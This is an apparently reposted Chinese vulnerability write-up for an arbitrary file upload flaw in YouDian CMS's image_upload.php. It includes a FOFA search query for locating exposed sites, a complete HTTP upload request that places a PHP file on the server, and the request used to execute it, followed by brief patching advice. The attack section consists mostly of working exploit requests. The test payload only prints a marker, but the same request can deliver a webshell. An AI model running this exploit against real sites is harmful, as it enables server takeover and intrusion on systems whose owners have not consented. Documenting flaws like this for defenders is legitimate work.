友点CMS image_upload.php 任意文件上传漏洞

admin 2024年7月12日10:09:55283 views字数 971阅读3分14秒阅读模式

产品简介

《友点企业网站管理系统》(YouDianCMS系统)集电脑网站、手机网站、微信、APP、小程序于一体,共用空间,数据自动同步,是五合一企业建站专业解决方案。

漏洞描述

友点CMS image_upload.php 文件 存在任意文件上传漏洞,攻击者可以上传任意文件,获取 WebShell,控制服务器权限,执行任意命令等。

网络空间测绘

Fofa

app="友点建站-CMS"

漏洞复现

POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1
Host:127.0.0.1
Content-Type: multipart/form-data; boundary=---***
User-Agent:Mozilla/5.0(Windows NT 6.1; WOW64; rv:34.0)Gecko/20100101Firefox/34.0
Content-Length:181
Accept-Encoding: gzip, deflate, br
Connection: close

-----***
Content-Disposition: form-data; name="files"; filename="test.php"
Content-Type: image/jpg

<?phpecho M2M6W2oRSjlV8qncE6KHTmCs6hS4sow7;unlink(__FILE__);?>
-----***--
友点CMS image_upload.php 任意文件上传漏洞

image.png访问地址:

GET /Public/image/uploads/xxx.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept-Encoding: gzip, deflate, br
Connection: close

友点CMS image_upload.php 任意文件上传漏洞
image.png

修复建议

1、如⾮必要,禁⽌公⽹访问该系统。

2、通过防⽕墙等安全设备设置访问策略,设置⽩名单访问。

3、升级产品到最新版本

原文始发于微信公众号(凝聚力安全团队):【漏洞复现】友点CMS image_upload.php 任意文件上传漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月12日10:09:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   友点CMS image_upload.php 任意文件上传漏洞https://cn-sec.com/archives/2945139.html
评论  2  访客  2
    • asdfd 0

      多看看以前的记录,别人发了几个月了,还发这个。。

        • admin

          @ asdfd 仅做记录,不好意思

      发表评论

      匿名网友 填写信息